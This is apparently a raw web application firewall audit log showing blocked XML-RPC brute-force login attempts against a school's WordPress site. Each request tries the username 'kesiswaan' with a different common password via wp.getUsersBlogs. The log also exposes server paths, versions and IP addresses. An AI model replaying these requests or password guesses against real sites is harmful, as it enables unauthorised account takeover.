[severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869200603816 4675 (- - -) Stopwatch2: 1749869200603816 4675; combined=3407, p1=370, p2=2849, p3=0, p4=0, p5=107, sr=81, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2596f49-Z-- --65961518-A-- [14/Jun/2025:09:47:42 +0700] aEzizmmwZ6YUkjOdtI7MPgAAABE 103.236.140.4 42592 103.236.140.4 8181 --65961518-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --65961518-C-- wp.getUsersBlogs kesiswaan marketing2014_ --65961518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65961518-E-- --65961518-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869262420941 5016 (- - -) Stopwatch2: 1749869262420941 5016; combined=3792, p1=429, p2=3179, p3=0, p4=0, p5=106, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65961518-Z-- --d0af552f-A-- [14/Jun/2025:09:48:42 +0700] aEzjCmmwZ6YUkjOdtI7MWQAAABM 103.236.140.4 42668 103.236.140.4 8181 --d0af552f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0af552f-C-- wp.getUsersBlogs kesiswaan marketing2018 --d0af552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0af552f-E-- --d0af552f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869322749510 4333 (- - -) Stopwatch2: 1749869322749510 4333; combined=3327, p1=355, p2=2803, p3=0, p4=0, p5=98, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0af552f-Z-- --bac5ef48-A-- [14/Jun/2025:09:49:42 +0700] aEzjRmmwZ6YUkjOdtI7MnAAAABE 103.236.140.4 42816 103.236.140.4 8181 --bac5ef48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bac5ef48-C-- wp.getUsersBlogs kesiswaan Loginadmin --bac5ef48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac5ef48-E-- --bac5ef48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869382242052 4267 (- - -) Stopwatch2: 1749869382242052 4267; combined=3296, p1=374, p2=2754, p3=0, p4=0, p5=98, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac5ef48-Z-- --05267617-A-- [14/Jun/2025:09:50:57 +0700] aEzjkWIDXuKmWNi2UBS4JQAAAEk 103.236.140.4 42916 103.236.140.4 8181 --05267617-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --05267617-C-- wp.getUsersBlogs kesiswaan 123456abc --05267617-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05267617-E-- --05267617-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869457436948 6184 (- - -) Stopwatch2: 1749869457436948 6184; combined=4261, p1=560, p2=3524, p3=0, p4=0, p5=105, sr=104, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05267617-Z-- --531cde77-A-- [14/Jun/2025:09:52:02 +0700] aEzj0kMWfhkd5Y0sFtrsRQAAAJA 103.236.140.4 43046 103.236.140.4 8181 --531cde77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --531cde77-C-- wp.getUsersBlogs kesiswaan myp@ss --531cde77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --531cde77-E-- --531cde77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869522631764 5412 (- - -) Stopwatch2: 1749869522631764 5412; combined=3860, p1=489, p2=3199, p3=0, p4=0, p5=101, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --531cde77-Z-- --c2490c65-A-- [14/Jun/2025:09:53:05 +0700] aEzkEUMWfhkd5Y0sFtrsWAAAAI4 103.236.140.4 43178 103.236.140.4 8181 --c2490c65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2490c65-C-- wp.getUsersBlogs kesiswaan admin123456789 --c2490c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2490c65-E-- --c2490c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869585246580 5375 (- - -) Stopwatch2: 1749869585246580 5375; combined=3852, p1=465, p2=3144, p3=0, p4=0, p5=141, sr=89, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2490c65-Z-- --4e9fad01-A-- [14/Jun/2025:09:54:05 +0700] aEzkTWmwZ6YUkjOdtI7M1QAAABg 103.236.140.4 43286 103.236.140.4 8181 --4e9fad01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4e9fad01-C-- wp.getUsersBlogs kesiswaan mypc123 --4e9fad01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9fad01-E-- --4e9fad01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869645044965 4571 (- - -) Stopwatch2: 1749869645044965 4571; combined=3510, p1=402, p2=2884, p3=0, p4=0, p5=132, sr=79, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9fad01-Z-- --522c7b22-A-- [14/Jun/2025:09:55:10 +0700] aEzkjmmwZ6YUkjOdtI7M9QAAABI 103.236.140.4 43400 103.236.140.4 8181 --522c7b22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --522c7b22-C-- wp.getUsersBlogs kesiswaan 1q2w3e4r5t --522c7b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --522c7b22-E-- --522c7b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869710345596 6144 (- - -) Stopwatch2: 1749869710345596 6144; combined=4181, p1=563, p2=3441, p3=0, p4=0, p5=105, sr=101, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --522c7b22-Z-- --c1950614-A-- [14/Jun/2025:09:55:17 +0700] aEzklWmwZ6YUkjOdtI7NAQAAAAU 103.236.140.4 43426 103.236.140.4 8181 --c1950614-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1950614-C-- wp.getUsersBlogs kesiswaan 1234%^&* --c1950614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1950614-E-- --c1950614-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869717595682 5367 (- - -) Stopwatch2: 1749869717595682 5367; combined=3778, p1=473, p2=3133, p3=0, p4=0, p5=102, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1950614-Z-- --91a19649-A-- [14/Jun/2025:09:56:10 +0700] aEzkymIDXuKmWNi2UBS4rQAAAEI 103.236.140.4 43560 103.236.140.4 8181 --91a19649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91a19649-C-- wp.getUsersBlogs kesiswaan 212903 --91a19649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91a19649-E-- --91a19649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (77+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869770135265 4563 (- - -) Stopwatch2: 1749869770135265 4563; combined=3372, p1=343, p2=2836, p3=0, p4=0, p5=109, sr=78, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91a19649-Z-- --4372fc47-A-- [14/Jun/2025:09:57:10 +0700] aEzlBl3g_boun6Rx5jLTQAAAAM8 103.236.140.4 43664 103.236.140.4 8181 --4372fc47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4372fc47-C-- wp.getUsersBlogs kesiswaan joshua --4372fc47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4372fc47-E-- --4372fc47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869830756720 4245 (- - -) Stopwatch2: 1749869830756720 4245; combined=3238, p1=358, p2=2712, p3=0, p4=0, p5=97, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4372fc47-Z-- --c7e5b938-A-- [14/Jun/2025:09:58:10 +0700] aEzlQkMWfhkd5Y0sFtrskQAAAJg 103.236.140.4 43764 103.236.140.4 8181 --c7e5b938-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7e5b938-C-- wp.getUsersBlogs kesiswaan samsung --c7e5b938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7e5b938-E-- --c7e5b938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869890009475 4153 (- - -) Stopwatch2: 1749869890009475 4153; combined=3186, p1=345, p2=2656, p3=0, p4=0, p5=116, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7e5b938-Z-- --727c1551-A-- [14/Jun/2025:09:59:10 +0700] aEzlfkMWfhkd5Y0sFtrsvQAAAJU 103.236.140.4 43862 103.236.140.4 8181 --727c1551-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --727c1551-C-- wp.getUsersBlogs kesiswaan ohmnamah23 --727c1551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --727c1551-E-- --727c1551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869950007675 3927 (- - -) Stopwatch2: 1749869950007675 3927; combined=2911, p1=306, p2=2427, p3=0, p4=0, p5=105, sr=71, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --727c1551-Z-- --76638065-A-- [14/Jun/2025:10:00:14 +0700] aEzlvkMWfhkd5Y0sFtrtCgAAAIM 103.236.140.4 44046 103.236.140.4 8181 --76638065-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --76638065-C-- wp.getUsersBlogs kesiswaan dancer --76638065-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76638065-E-- --76638065-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (85+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870014529814 6104 (- - -) Stopwatch2: 1749870014529814 6104; combined=4207, p1=555, p2=3449, p3=0, p4=0, p5=118, sr=96, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76638065-Z-- --cce23a20-A-- [14/Jun/2025:10:01:14 +0700] aEzl-l3g_boun6Rx5jLTVAAAAMo 103.236.140.4 44236 103.236.140.4 8181 --cce23a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cce23a20-C-- wp.getUsersBlogs kesiswaan 1234561 --cce23a20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cce23a20-E-- --cce23a20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749870074094485 5418 (- - -) Stopwatch2: 1749870074094485 5418; combined=3791, p1=427, p2=3159, p3=0, p4=0, p5=117, sr=89, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
